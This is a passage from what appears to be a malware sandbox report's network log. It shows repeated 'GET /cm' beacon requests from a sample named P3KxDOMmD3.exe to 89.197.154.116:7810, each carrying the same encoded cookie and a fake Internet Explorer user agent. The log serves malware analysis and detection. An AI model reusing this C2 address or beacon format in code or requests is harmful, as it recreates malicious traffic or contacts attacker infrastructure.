                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.44993989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:26.220334053 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.44996489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:30.410578012 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.44997489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:32.114314079 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.44998589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:33.848839045 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.44999989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:35.566514015 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.45001089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:37.363455057 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.45002289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:39.086510897 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.45003189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:40.784991026 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.45003689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:42.676671982 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.45004789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:44.366333961 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.45005689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:46.052144051 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.45006189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:47.822410107 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.45006289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:49.522207975 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.45006389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:51.242039919 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.45006489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:52.926464081 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.45006589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:54.649739027 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.45006689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:56.348076105 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.45006789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:58.071683884 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.45006889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:59.771812916 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.45006989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:01.082264900 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.45007089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:02.863746881 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.45007189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:04.647593975 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.45007289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:06.399795055 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.45007389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:08.100724936 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.45007489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:09.802129030 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                71192.168.2.45007589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:11.488812923 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.45007689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:13.223272085 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.45007789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:14.910922050 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.45007889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:19.103069067 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.45007989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:20.786087990 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.45008089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:22.475806952 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.45008189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:24.164942980 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.45008289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:02:25.899882078 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
